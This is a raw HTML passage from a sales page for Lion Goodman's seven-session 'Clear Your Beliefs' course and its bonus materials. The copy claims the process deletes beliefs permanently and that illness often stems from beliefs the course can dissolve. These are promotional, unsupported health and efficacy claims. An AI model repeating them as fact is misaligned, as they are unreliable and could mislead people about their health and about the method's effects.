triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p></div>\n\n<div class="parg-text"><p>These programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p></div>\n\n<div class="parg-text"><p><strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong></p></div>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<div class="parg-text"><p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p></div>\n\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p></div><p><strong>Here''s why:</strong></p>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\n<div class="parg-text"><p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong></p></div>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\n<div class="parg-text"><p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.</p></div>\n\n<div class="parg-text"><p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p></div>\n\n<h1>Imagine The Life You Desire</h1>\n<div class="parg-text"><p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n <div class="parg-text"><p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<div class="parg-text"><p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<div class="parg-text"><p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<div class="parg-text"><p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<div class="parg-text"><p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<div class="parg-text"><p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong></p></div>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<div class="parg-text"><p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<div class="parg-text"><p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p></div>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n <div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p></div>\n\n <div class="parg-text"><p>If you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p></div>\n\n <div class="parg-text"><p>During each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p></div>\n\n <div class="parg-text"><p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p></div>\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n <div class="parg-text"><p><strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p></div>\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.</p>\n\n<p>I was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"</p>\n\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)</p>\n\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.</p>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n\n<p>When your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!</p>\n\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n\n<p>Having worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.</p>\n\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n\n<p>A lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n\n<p>In the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n\n<p>Live the life of your dreams. There’s nothing to stop you – except a few old beliefs...</p>\n\n<p>In gratitude, and with warm wishes for your total success,</p>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\n <div class="parg-text"><p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p></div>\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n\n<p>In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.</p>\n\n<p>What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>” \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. \n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a 